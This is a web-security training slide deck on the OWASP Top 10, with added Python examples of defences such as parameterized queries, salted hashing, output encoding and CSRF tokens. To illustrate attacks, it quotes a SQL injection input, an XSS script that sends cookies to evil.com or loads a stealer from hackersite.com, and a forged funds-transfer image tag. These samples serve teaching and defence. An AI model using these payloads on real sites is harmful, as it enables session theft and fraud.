Web Security & OWASP
By-Isuru Samaraweera
Agenda
• What is web security and why?
• Introduction to OWASP
• OWASP top 10
• OWASP Security testing tools
• General Security testing tools
• Q & A
What is web security and why?
• Security of websites, web applications and web services.
• Emergence of Web 2.0
• Intruders exploit vulnerabilities
• Techniques: XSS, SQL injection etc.
• Attacker profiles
• Catastrophic security hacks
• Sony Entertainment 2011- 77 million accounts with credit card numbers
• JP Morgan chase 2014 -7.6million account information
• Master Card- 2005 -40 million accounts
• Business risk
• Trust issues
• Overhead costs
• Security checkpoints and techniques
• Early stages of development
OWASP(https://www.owasp.org)
• The Open Web Application Security Project (OWASP)
• Non profit organization, open community
• Vulnerabilities, threats, attacks and countermeasures
• Development guide
• https://www.owasp.org/index.php/Projects/OWASP_Development_Guide
• Testing guide
• https://www.owasp.org/images/5/56/OWASP_Testing_Guide_v3.pdf
• Code review guide
• https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf
• Webgoat sample web application
• https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
• Mailing lists
• https://lists.owasp.org/mailman/listinfo
• Newsletter
• https://www.owasp.org/index.php/Category:OWASP_Newsletter
• Many more…
OWASP top 10 (2017)
• Injection
• Broken Authentication and Session Management
• Cross Site Scripting (XSS)
• Broken access Control
• Security Misconfiguration
• Sensitive Data Exposure
• Missing Function Level Access Control
• Cross Site Request Forgery (CSRF)
• Using Components with Known Vulnerabilities
• Under protected APIs
(#1)-Injection
• Send untrusted data into the system
• Text based attacks
• External, internal parties
• SQL, LDAP, JPQL, XPath, NoSQL
• String query = "SELECT * FROM user_data WHERE lastName='" + request.getParameter("lastName") + "'";
• Query HQLQuery = session.createQuery("FROM user_data WHERE lastName ='" + request.getParameter("lastName") + "'");
• http://example.com/app/userView?lastName=' or '1'='1
Preventing Injection
• Avoid dynamic queries
• Parameterized queries
• PreparedStatement,SQLCommand,PDO
• Stored procedures
• Input validation
• Carefully escape special characters if no API is available
• OWASP Enterprise Security API
• ESAPI.encoder().encodeForSQL( new OracleCodec(), queryparam );
• Use code analysis tools
• https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
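The deck's Java example builds the query by string concatenation and then shows the `' or '1'='1` request that breaks it. The following added example (written in Python against an in-memory SQLite table; it is not code from the deck, and the user_data table contents are constructed sample data) runs the same input through a concatenated query and through a parameterized query side by side, so the difference in returned rows can be observed directly:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the deck's user_data table (sample rows only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO user_data VALUES (?, ?, ?)",
        [(1, "Alice", "Smith"), (2, "Bob", "Jones"), (3, "Carol", "Smith")],
    )
    return conn


def find_by_last_name_vulnerable(conn: sqlite3.Connection, last_name: str) -> list:
    # Dynamic query: the request parameter is concatenated into the SQL text,
    # the Python equivalent of the deck's Java string-building example.
    query = "SELECT * FROM user_data WHERE last_name='" + last_name + "'"
    return conn.execute(query).fetchall()


def find_by_last_name_safe(conn: sqlite3.Connection, last_name: str) -> list:
    # Parameterized query: the driver binds the value; it is never parsed as SQL.
    query = "SELECT * FROM user_data WHERE last_name=?"
    return conn.execute(query, (last_name,)).fetchall()


def compare(last_name: str) -> dict:
    """Run both versions on the same input and report how many rows each returns."""
    conn = make_db()
    return {
        "vulnerable_rows": len(find_by_last_name_vulnerable(conn, last_name)),
        "safe_rows": len(find_by_last_name_safe(conn, last_name)),
    }


if __name__ == "__main__":
    print(compare("Smith"))        # both variants return the 2 matching rows
    print(compare("' or '1'='1"))  # the deck's input: 3 rows vs 0 rows
```

With a normal last name both functions agree; with the deck's input the concatenated query's WHERE clause becomes `last_name='' or '1'='1'` and returns every row, while the parameterized query simply looks for a customer whose last name is literally `' or '1'='1` and returns nothing.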
(#2)-Broken Authentication and Session
Management
• Custom authentication and session management with flaws
• Credentials not protected with hashing
• Insider attacks
• Credentials can be guessed
• Session id exposed in the URL -> session fixation
• Session id won't time out
• Session ids are not rotated on successful logins
• http://website.com/login.php?;jsessionid=2P0OC2JSNDLPSKHCJUN2JV&d
Protecting the Password
• Hashing
• Transport
• Storage
Crack Password Hash
• Dictionary attack
• File containing words, phrases, common passwords
• Brute-force attack
• Tries every possible combination of characters up to a given length.
• Look up table
• Dictionary in a lookup table data structure
• Rainbow table
• High performance lookup
User Registration with Salt
• App posts the username foo@example.com with password pass
• Server generates a random salt r
• Server computes h=H(r|pass)
• Server stores (foo@example.com, h, r) in the DB
Simplified login flow
• App posts username foo@example.com and password pass
• Server looks up the salt r using the user id
• Server computes the hash h'=H(r|pass)
• If (foo@example.com, h') exists in the DB, allow login
Attack on password database
Hashing with key and random salt
• Is it safe?
Hashing recipe
• Bind password hash value to account
• Use application secret
• Follow password hashing best practices
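The registration and login flows above and the hashing recipe on this slide fit together in a few lines. The added example below (Python, not code from the deck) implements h = H(r|pass) with a random per-user salt r, mixes in an application secret as the recipe asks, uses PBKDF2-HMAC-SHA256 as the password hashing primitive, and compares in constant time. The APP_SECRET value, the iteration count and the in-memory dict standing in for the user database are all constructed for the example:

```python
import hashlib
import hmac
import os

# Constructed application secret ("pepper"). In production it lives outside the
# database (config store, secrets manager or HSM), so a stolen DB alone is not
# enough to verify password guesses offline.
APP_SECRET = b"constructed-application-secret"
ITERATIONS = 100_000  # PBKDF2 work factor; tune to your hardware


def H(r: bytes, password: str) -> bytes:
    """The deck's h = H(r | pass), realised as PBKDF2-HMAC-SHA256 over a
    peppered password: the application secret is mixed in with HMAC first."""
    peppered = hmac.new(APP_SECRET, password.encode("utf-8"), hashlib.sha256).digest()
    return hashlib.pbkdf2_hmac("sha256", peppered, r, ITERATIONS)


def register(db: dict, username: str, password: str) -> None:
    """Registration flow from the deck: random salt, hash, store (user, h, r)."""
    r = os.urandom(16)      # server generates a random salt r
    h = H(r, password)      # server computes h = H(r | pass)
    db[username] = (h, r)   # server stores (username, h, r) in the DB


def login(db: dict, username: str, password: str) -> bool:
    """Login flow from the deck: look up the salt, recompute, compare."""
    record = db.get(username)
    if record is None:
        H(os.urandom(16), password)  # same work for unknown users, so timing does not reveal them
        return False
    h, r = record                      # server looks up the salt r using the user id
    h2 = H(r, password)                # server computes h' = H(r | pass)
    return hmac.compare_digest(h, h2)  # constant-time comparison; allow login only on match


def demo() -> dict:
    """Exercise both flows on a constructed in-memory user table."""
    db: dict = {}
    register(db, "foo@example.com", "pass")
    register(db, "bar@example.com", "pass")  # same password, different salt
    return {
        "correct": login(db, "foo@example.com", "pass"),
        "wrong": login(db, "foo@example.com", "Pass"),
        "unknown_user": login(db, "nobody@example.com", "pass"),
        "same_password_same_hash": db["foo@example.com"][0] == db["bar@example.com"][0],
    }


if __name__ == "__main__":
    print(demo())
```

Two users with the same password end up with different stored hashes because each has its own salt, which is what defeats the lookup and rainbow tables of the previous slides; the pepper additionally means an attacker holding only the database cannot even start verifying guesses.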
Transport Security of a password
Hashing the password on client
Encrypt the password
• Asymmetric encryption
• Problems?
Preventing broken authentication contd…
• Implement Proper Password Strength Controls
• Password length > 10 and < 128
• Password complexity
• at least 1 uppercase character (A-Z)
• at least 1 lowercase character (a-z)
• at least 1 digit (0-9)
• at least 1 special character (punctuation); do not forget to treat space as a special character too
• Not more than 2 identical characters in a row (e.g., 111 not allowed)
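The rules above turn into a short validator. This added example (Python; not the deck's code) checks every rule listed on the slide, counts any non-alphanumeric character, including space, as special, and reports all broken rules at once rather than stopping at the first:

```python
import re


def check_password_strength(password: str) -> list:
    """Return the list of slide rules the password breaks; empty means it passes."""
    problems = []
    if not 10 < len(password) < 128:
        problems.append("length must be more than 10 and fewer than 128 characters")
    if not re.search(r"[A-Z]", password):
        problems.append("needs at least one uppercase character (A-Z)")
    if not re.search(r"[a-z]", password):
        problems.append("needs at least one lowercase character (a-z)")
    if not re.search(r"[0-9]", password):
        problems.append("needs at least one digit (0-9)")
    # Anything that is not an ASCII letter or digit counts as special, so a space qualifies.
    if not re.search(r"[^A-Za-z0-9]", password):
        problems.append("needs at least one special character (punctuation or space)")
    # (.)\1\1 matches any character repeated three times in a row, e.g. "111" or "aaa".
    if re.search(r"(.)\1\1", password):
        problems.append("must not contain more than 2 identical characters in a row")
    return problems


def is_strong(password: str) -> bool:
    return not check_password_strength(password)


if __name__ == "__main__":
    for candidate in ["Correct horse 42!", "Passw0rd!!!", "short1A!", "NoSpecialChars123"]:
        print(repr(candidate), check_password_strength(candidate))
```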
Preventing broken authentication contd..
• Authentication and Error Messages
• respond with a generic error message
• Incorrect Response Examples
• "Login for User foo: invalid password"
• "Login failed, invalid user ID"
• "Login failed; account disabled"
• "Login failed; this user is not active"
• Correct Response example
• "Login failed; Invalid userID or password"
Preventing broken authentication contd..
• Prevent brute force attacks
• Account lock out
• Multifactor authentication
• Logging and Monitoring
• Use of authentication protocols that require no password
• Oauth
• OpenId
• Saml
• Leverage available frameworks and tools
• Apache Shiro
• Spring security
• Owasp esapi
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet
Preventing Session Management issues
• Secure login over HTTPS
• Password submitted encrypted
• Immediate redirect to HTTP
• Session id sent in clear text -> vulnerability
Preventing Session Management issues contd..
• User requests an HTTP page; the response redirects to HTTPS
• The 302 response itself travels over HTTP: vulnerability point
Preventing Session Management issues contd..
• HSTS - HTTP Strict Transport Security
• Opt-in security control
• Instructs the browser to enforce strict transport security (STS) for the site
• HSTS forces
• All communications over HTTPS
• No insecure HTTP requests sent from the browser
• No option for the user to override untrusted certificates
Enabling HSTS
• In Apache add the lines below to .htaccess (the Header directive needs mod_headers)
# Use HTTP Strict Transport Security to force client to use secure connections only
Header always set Strict-Transport-Security "max-age=300; includeSubDomains"
max-age => The time, in seconds, that the browser should remember that this site is only to be accessed using HTTPS.
includeSubDomains => If this optional parameter is specified, this rule applies to all of the site's subdomains as well.
• Can be done in Nginx, IIS etc.
Preventing Session Management issues contd..
• HTTP Strict Transport Security (HSTS)
• Cookies
• Secure
• <secure>true</secure>
• HttpOnly
• <http-only>true</http-only>
• Cache-Control: no-cache,no-store
• Pragma: no-cache
• New session ids on consecutive logins
• https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
• https://www.owasp.org/index.php/Authentication_Cheat_Sheet
• https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_authentication
• https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_
Sheet
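The HSTS slide and the cookie and cache-control settings on this slide are all visible in a single login response, so they can be checked together. The added example below (Python; not the deck's code) parses the Strict-Transport-Security directives and audits a response's headers for the settings listed here. The one-year minimum max-age (31536000 seconds) is an assumed production threshold; the deck's max-age=300 is fine for a first rollout but is flagged as low. Both header sets are constructed samples, not captured from a real site:

```python
def parse_hsts(value: str) -> dict:
    """Split a Strict-Transport-Security value into {directive: value-or-True}."""
    directives = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, sep, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"') if sep else True
    return directives


def audit_response_headers(headers: list, min_max_age: int = 31536000) -> list:
    """Return findings for a login response's headers (empty list = all checks pass)."""
    findings = []
    by_name = {}
    for name, value in headers:
        by_name.setdefault(name.lower(), []).append(value)

    hsts = by_name.get("strict-transport-security")
    if not hsts:
        findings.append("Strict-Transport-Security header missing")
    else:
        d = parse_hsts(hsts[0])
        raw = d.get("max-age", "0")
        max_age = int(raw) if isinstance(raw, str) and raw.isdigit() else 0
        if max_age < min_max_age:
            findings.append(f"HSTS max-age={max_age} is below {min_max_age}")
        if "includesubdomains" not in d:
            findings.append("HSTS does not include includeSubDomains")

    for cookie in by_name.get("set-cookie", []):
        cookie_name = cookie.split("=", 1)[0].strip()
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append(f"cookie {cookie_name} lacks the Secure flag")
        if "httponly" not in attrs:
            findings.append(f"cookie {cookie_name} lacks the HttpOnly flag")

    cache = ",".join(by_name.get("cache-control", [])).lower()
    if "no-store" not in cache or "no-cache" not in cache:
        findings.append("Cache-Control should be 'no-cache, no-store'")
    pragma = [v.strip().lower() for v in by_name.get("pragma", [])]
    if "no-cache" not in pragma:
        findings.append("Pragma: no-cache missing")
    return findings


# Constructed sample responses (the weak one mirrors the slide's settings).
WEAK_HEADERS = [
    ("Strict-Transport-Security", "max-age=300; includeSubDomains"),
    ("Set-Cookie", "JSESSIONID=2P0OC2JSNDLPSKHCJUN2JV; Path=/"),
    ("Cache-Control", "private"),
]
HARDENED_HEADERS = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "JSESSIONID=2P0OC2JSNDLPSKHCJUN2JV; Path=/; Secure; HttpOnly"),
    ("Cache-Control", "no-cache, no-store"),
    ("Pragma", "no-cache"),
]

if __name__ == "__main__":
    for finding in audit_response_headers(WEAK_HEADERS):
        print("weak:", finding)
    print("hardened:", audit_response_headers(HARDENED_HEADERS))
```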
(#3)-Cross Site scripting(XSS)
• Text-based attack scripts that exploit the interpreter in the browser.
• The attacker adds the following comment:
• Great price for a great item! Read my review here <script src="http://hackersite.com/authstealer.js"> </script>.
• Document.location=http://evil.com?id=document.cookie
Inject malicious HTML
Preventing XSS
• Html escape before inserting untrusted data
• String safe = ESAPI.encoder().encodeForHTML( request.getParameter( "input" ) );
• & --> &amp;
• < --> &lt;
• > --> &gt;
• JavaScript Escape Before Inserting Untrusted Data
• <script>alert('...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...')</script>
• String safe = ESAPI.encoder().encodeForJavaScript( request.getParameter( "input" ) );
• CSS Escape Before Inserting Untrusted Data
• <style>selector { property : ...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...; } </style>
• String safe = ESAPI.encoder().encodeForCss( request.getParameter( "input" ) );
Preventing XSS contd…
• URL Escape Before Inserting Untrusted Data
• <a href="http://www.somesite.com?test=...ESCAPE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a>
• String safe = ESAPI.encoder().encodeForURL( request.getParameter( "input" ) );
• XSS filters: block requests with dangerous tags and scripts
• OWASP AntiSamy project
• HTML and CSS encoding.
• https://www.owasp.org/index.php/Category:OWASP_AntiSamy_Project
• HTML sanitizer projects
• https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
• https://github.com/mganss/HtmlSanitizer
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
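The deck leans on ESAPI's encodeForHTML / encodeForJavaScript / encodeForURL. The added example below (Python; not the deck's or ESAPI's code) writes the three context encoders from the standard library and runs the review-comment scenario from the XSS slide through the HTML one, so the `<script>` tag reaches the page as inert text. The review page markup is constructed for the example:

```python
import html
from urllib.parse import quote


def encode_for_html(s: str) -> str:
    """HTML body/attribute context: encode & < > " ' and also / (as the cheat sheet rule does)."""
    return html.escape(s, quote=True).replace("/", "&#x2F;")


def encode_for_javascript(s: str) -> str:
    """JavaScript string context: every non-alphanumeric character becomes \\xHH or \\uHHHH,
    so untrusted data can only ever be string content inside a script block."""
    out = []
    for ch in s:
        cp = ord(ch)
        if ch.isalnum() and cp < 128:
            out.append(ch)
        elif cp < 256:
            out.append(f"\\x{cp:02X}")
        else:
            out.append(f"\\u{cp:04X}")
    return "".join(out)


def encode_for_url(s: str) -> str:
    """URL parameter context: percent-encode everything except unreserved characters."""
    return quote(s, safe="")


def render_review(untrusted_comment: str) -> str:
    """Constructed review page: the comment lands in HTML body context, so HTML-encode it."""
    return '<p class="review">' + encode_for_html(untrusted_comment) + "</p>"


# The comment from the deck's XSS slide (quoted from the slide, not a live payload).
SAMPLE_COMMENT = (
    "Great price for a great item! Read my review here "
    '<script src="http://hackersite.com/authstealer.js"> </script>.'
)

if __name__ == "__main__":
    print(render_review(SAMPLE_COMMENT))
    print(encode_for_javascript("alert('x')"))
    print(encode_for_url("a b&c"))
```

Which encoder applies depends only on where the data is inserted, not on where it came from; the same comment would need encode_for_javascript if it were written into a script block and encode_for_url if it became a query parameter.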
(#4)-Broken access Control
• Unprivileged function access
• http://example.com/app/getappInfo
• http://example.com/app/admin_getappInfo
• Unauthorized data access
• http://soomebank.com/showacct?id=101
• http://soomebank.com/showacct?id=102
• Prevention
• Access control matrix
• Check access
• Do not assume that users will be unaware of special or hidden URLs or APIs.
• Penetration tests
• Regular audits, code reviews, Automated verification
• Principle of least privilege
• Principle of defense in depth
• https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference
• https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access
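The two URL pairs on this slide are a function-level check (getappInfo vs admin_getappInfo) and an object-level check (showacct?id=101 vs id=102). The added example below (Python; not the deck's code) enforces both on every request from a small access control matrix, with unknown functions and unknown ids denied by default. The matrix, the account ownership table and the two users are constructed for the example:

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    roles: frozenset


# Constructed access control matrix: path -> roles allowed to call it.
# Anything not listed is denied by default.
ACCESS_MATRIX = {
    "/app/getappInfo": {"user", "admin"},
    "/app/admin_getappInfo": {"admin"},
    "/showacct": {"user", "admin"},
}

# Constructed ownership table: account id -> owning user.
ACCOUNT_OWNERS = {101: "alice", 102: "bob"}


def check_function_access(user: User, path: str) -> bool:
    """Function-level check: the caller's roles must intersect the matrix entry."""
    return bool(user.roles & ACCESS_MATRIX.get(path, set()))


def check_account_access(user: User, account_id: int) -> bool:
    """Object-level check: the account must belong to the caller (or the caller is admin)."""
    owner = ACCOUNT_OWNERS.get(account_id)
    if owner is None:
        return False
    return owner == user.name or "admin" in user.roles


def handle_request(user: User, path: str, params: dict) -> tuple:
    """Dispatch one request. Every branch performs its check server-side, so
    knowing or guessing a hidden URL or another customer's id is not enough."""
    if not check_function_access(user, path):
        return 403, "forbidden"
    if path == "/showacct":
        try:
            account_id = int(params.get("id", ""))
        except ValueError:
            return 400, "bad id"
        if not check_account_access(user, account_id):
            return 403, "forbidden"  # same answer for missing and foreign ids: no enumeration hint
        return 200, f"account {account_id} of {ACCOUNT_OWNERS[account_id]}"
    return 200, f"ok: {path}"


# Constructed users for the demonstration.
ALICE = User("alice", frozenset({"user"}))
ADMIN = User("root", frozenset({"admin"}))

if __name__ == "__main__":
    print(handle_request(ALICE, "/showacct", {"id": "101"}))
    print(handle_request(ALICE, "/showacct", {"id": "102"}))
    print(handle_request(ALICE, "/app/admin_getappInfo", {}))
```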
(#5)-Security misconfiguration
• Can happen at any level
• Web server
• App server
• Database
• Custom code
• Out of date software
• Unnecessary ports,services
• Error message throws stack trace?
• Framework settings set to secure value?(struts,spring,.net etc)
• Prevention
• Frequent audits
• Deployment process
• Automate configuration validity
• https://www.owasp.org/index.php/Configuration
• https://www.owasp.org/index.php/Error_Handling
• https://www.owasp.org/index.php/Testing_for_configuration_management
• https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)
• https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management
(#6)-Sensitive data exposure
• Passwords, credit card numbers etc. (in transit or at rest)
• Not encrypting sensitive data
• Using weak keys and algorithms to encrypt
• SSL not enabled on the entire path
• Prevention measures
• Encrypt sensitive data correctly
• AES-256
• Key encrypting key
• Hardware security modules
• RSA 2048
• Don’t store sensitive data unnecessarily
• Disable caching and auto completion
• https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
• https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• https://www.owasp.org/index.php/Testing_for_SSL-TLS
(#7) -Insufficient Attack Protection
• Inability to detect, prevent, and respond to both manual and automated
attacks
• Attack with OWASP ZAP, sqlmap tools (http://sqlmap.org/)
• Manual human attack
• Detect attacks -> OWASP App sensor
• An input a legitimate client can’t generate?
• Unusual usage patterns, repeated requests, spikes?
• Respond to attacks->OWASP App sensor
• Decide whether to automatically block requests,
• IP addresses, or IP ranges.
• Consider disabling or monitoring misbehaving user accounts.
• Patch quickly
Monitor security
• Monitor log files
• Monitor network bandwidth
• https://www.owasp.org/index.php/OWASP_AppSensor_Project
• https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications
• https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet
• https://www.owasp.org/index.php/Virtual_Patching_Cheat_Sheet
• https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
• https://www.owasp.org/index.php/Intrusion_Detection
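The "detect, then respond" loop of the AppSensor slides can be shown over an access log. The added example below (Python; not the deck's or AppSensor's code) runs two of the detectors named on the slide over a constructed log excerpt: a sliding-window count of repeated failed logins per client (a usage spike), and requests for a function the client is not allowed to call (an input a legitimate client would not generate), and turns the hits into response recommendations. The log format, IP addresses (documentation ranges) and thresholds are all constructed:

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed access-log excerpt: timestamp, client IP, method, path, status.
SAMPLE_LOG = """\
2017-05-01T10:00:01 203.0.113.5 POST /login 401
2017-05-01T10:00:02 203.0.113.5 POST /login 401
2017-05-01T10:00:03 203.0.113.5 POST /login 401
2017-05-01T10:00:04 203.0.113.5 POST /login 401
2017-05-01T10:00:05 203.0.113.5 POST /login 401
2017-05-01T10:00:06 203.0.113.5 POST /login 401
2017-05-01T10:00:07 198.51.100.9 POST /login 401
2017-05-01T10:00:40 198.51.100.9 POST /login 200
2017-05-01T10:01:00 192.0.2.44 GET /app/getappInfo 200
2017-05-01T10:01:00 192.0.2.44 GET /app/admin_getappInfo 403
"""


def parse_line(line: str) -> tuple:
    ts, ip, method, path, status = line.split()
    return datetime.fromisoformat(ts), ip, method, path, int(status)


def detect_login_bursts(log_text: str, threshold: int = 5, window_s: int = 60) -> dict:
    """Sliding window per client: alert when `threshold` failed logins fall inside `window_s`.
    Returns {ip: failures_in_window_at_alert_time}."""
    window = timedelta(seconds=window_s)
    recent = defaultdict(deque)
    alerts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, _method, path, status = parse_line(line)
        if path != "/login" or status != 401:
            continue
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold and ip not in alerts:
            alerts[ip] = len(q)
    return alerts


def detect_forbidden_calls(log_text: str) -> dict:
    """A 403 on a function the client may not call is a request no legitimate client
    generates; collect them per client. Returns {ip: [paths]}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, ip, _method, path, status = parse_line(line)
        if status == 403:
            hits[ip].append(path)
    return dict(hits)


def respond(alerts: dict, forbidden: dict) -> list:
    """Turn detections into the response decisions the slide lists (block, review)."""
    actions = []
    for ip, n in alerts.items():
        actions.append(f"block {ip} temporarily: {n} failed logins within the window")
    for ip, paths in forbidden.items():
        actions.append(f"flag client {ip} for review: requested forbidden {', '.join(paths)}")
    return actions


if __name__ == "__main__":
    for action in respond(detect_login_bursts(SAMPLE_LOG), detect_forbidden_calls(SAMPLE_LOG)):
        print(action)
```

The second client (198.51.100.9) fails once and then succeeds, which is ordinary user behaviour and produces no action; only the burst and the forbidden admin call are escalated.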
(#8)-Cross Site Request Forgery
• Attacker tricks the victim with URLs
• Execute unwanted actions
• Compromise the entire application
• http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243
• Attacker emails the URL below to the victim
• <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
Preventing CSRF
• Include a unique token in a hidden field
• Verify the token on each request
• CSRFGuard
• Reauthenticate
• https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
• http://lists.owasp.org/pipermail/owasp-csrfguard
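The two bullets "unique token in a hidden field" and "verify the token on each request" are the whole mechanism. The added example below (Python; not the deck's or CSRFGuard's code) issues a per-session token, embeds it in the transfer form, and rejects the state-changing request unless the token matches in constant time. It also insists on POST, which on its own already defeats the `<img src=...>` trick from the previous slide because an image fetch is a GET. The Session class and the form markup are constructed for the example:

```python
import hmac
import secrets


class Session:
    """Constructed server-side session: id plus one CSRF token for its lifetime."""

    def __init__(self):
        self.id = secrets.token_hex(16)
        self.csrf_token = secrets.token_urlsafe(32)  # unique, unguessable, per session


def render_transfer_form(session: Session) -> str:
    """The token goes into a hidden field of every state-changing form."""
    return (
        '<form method="POST" action="/app/transferFunds">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input name="amount"><input name="destinationAccount">'
        "</form>"
    )


def handle_transfer(session: Session, method: str, params: dict) -> tuple:
    """Verify the token on each request before doing anything with side effects."""
    if method != "POST":
        return 405, "state-changing action must use POST"
    supplied = params.get("csrf_token", "")
    if not hmac.compare_digest(supplied, session.csrf_token):
        return 403, "CSRF token missing or invalid"
    return 200, f"transferred {params['amount']} to {params['destinationAccount']}"


if __name__ == "__main__":
    s = Session()
    # The forged request from the slide: a cross-site GET carrying no token.
    print(handle_transfer(s, "GET", {"amount": "1500", "destinationAccount": "attackersAcct"}))
    # A legitimate submission of the rendered form.
    print(handle_transfer(s, "POST", {"csrf_token": s.csrf_token,
                                      "amount": "1500", "destinationAccount": "4673243243"}))
```

A cross-site page can make the victim's browser send the request (with the victim's cookies), but it cannot read the victim's form to learn the token, so the forged request arrives without it and is refused.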
(#9)-Using components with known vulnerabilities
• Outdated libraries
• Apache CXF Authentication Bypass (2012)
• Call with no identity token => invoke any web service with full permission
• Spring Remote Code Execution (2011/2012)
• Expression Language flaw => execute arbitrary code on the server
• Struts2 Remote Code Execution (2017)
• Mishandles file upload
• Content-Type header flaw => execution of arbitrary code on the server
Preventing Using components with known vulnerabilities
• Identify all components and dependent libraries
• OWASP_Dependency_Check
• https://www.owasp.org/index.php/OWASP_Dependency_Check
• Retire.js
• https://github.com/retirejs/retire.js/
• Monitor security of these components
• Mailing lists
• Official sites
• Security policy on 3rd party libraries
• Software development practices to use
• Passing security tests
• Acceptable licenses
• Wrappers to expose only the required function in an api
• https://cve.mitre.org/about/
• https://www.owasp.org/index.php/Virtual_Patching_Best_Practices
(#10)- Underprotected APIs
• REST, JSON, and XML APIs
• Mobile app connecting to a remote API (username, password and account number)
• Public SMS JSON API -> SQL injection
• XML XXE
• External entity is processed by the XML parser
• Prevention
• Secure communications between the client and your APIs.
• Strong authentication scheme for your APIs.
• Parser configuration hardened against attack.
• Protect against injection of all forms
• https://www.owasp.org/index.php/REST_Security_Cheat_Sheet
• https://www.owasp.org/index.php/Web_Service_Security_Cheat_Sheet
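"Parser configuration hardened against attack" for the XXE bullet means the parser must never process entity declarations from a client document. The added example below (Python's standard-library expat parser; not the deck's code) takes the approach the defusedxml library also uses: it refuses any document that carries a DOCTYPE, so no entity (external or otherwise) can be declared, and it installs no external-entity handler, so expat would not fetch one anyway. The XML account document and the helper names are constructed for the example:

```python
import xml.parsers.expat


class DtdNotAllowed(ValueError):
    """Raised when a client document tries to declare a DTD (and so entities)."""


def parse_api_payload(xml_bytes: bytes) -> dict:
    """Parse a small flat XML body into {tag: text} with a hardened expat parser."""
    parser = xml.parsers.expat.ParserCreate()
    result = {}
    current = []
    state = {"tag": None}

    def start_doctype(name, sysid, pubid, has_internal_subset):
        # Rejecting every DTD means no <!ENTITY ...> can be declared, which removes
        # external entity resolution (XXE) and entity-expansion bombs in one step.
        raise DtdNotAllowed("DOCTYPE declarations are not accepted by this API")

    def start_element(name, attrs):
        state["tag"] = name
        current.clear()

    def char_data(data):
        current.append(data)

    def end_element(name):
        if state["tag"] == name:  # leaf element: record its text
            result[name] = "".join(current).strip()
        state["tag"] = None

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    # No ExternalEntityRefHandler is installed, so expat never fetches external entities.
    parser.Parse(xml_bytes, True)
    return result


def is_accepted(xml_bytes: bytes) -> bool:
    """True if the hardened parser accepts the document, False if it is rejected."""
    try:
        parse_api_payload(xml_bytes)
        return True
    except (DtdNotAllowed, xml.parsers.expat.ExpatError):
        return False


# Constructed API payloads.
BENIGN = b"<account><number>1234</number><owner>alice</owner></account>"
WITH_DTD = b'<!DOCTYPE account [<!ENTITY greeting "hello">]><account><owner>&greeting;</owner></account>'

if __name__ == "__main__":
    print(parse_api_payload(BENIGN))   # {'number': '1234', 'owner': 'alice'}
    print(is_accepted(WITH_DTD))       # False: DOCTYPE refused before any entity is declared
```

Refusing DTDs outright is the simplest rule to audit; if an API genuinely needs a DTD, the narrower alternative is to keep the rejection of external entities and cap entity expansion, but that requires reasoning about each parser's defaults, which is exactly where XXE misconfigurations come from.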
OWASP Testing tools
• The OWASP Application Security Verification Standard (ASVS) Project
• Test web application technical security controls
• Requirements for secure development.
• Procurement
• https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project
• OWASP Live CD project
• Best open source security tools in a single bootable environment
• Boot from this Live CD or run it as a VM
• Access to a full security testing suite
• No configuration required
• OWASP ZAP
• https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
General Security Testing tools
• IronWASP (https://ironwasp.org/)
• Over 25 kinds of web vulnerabilities
• Wireshark (https://www.wireshark.org/)
• Network packet analyzer.
• Google nogotofail (https://github.com/google/nogotofail)
• Known TLS/SSL vulnerabilities and misconfigurations.
• sqlmap (http://sqlmap.org/)
• SQL injection
• Qualys(https://www.qualys.com)
Security code review
• Fastest and most accurate
• Data Validation
• Authentication
• Session management
• Authorization
• Cryptography
• Error handling
• Logging
• Security Configuration
• Network Architecture
• Tools
• Code crawler
• Orizon
• O2
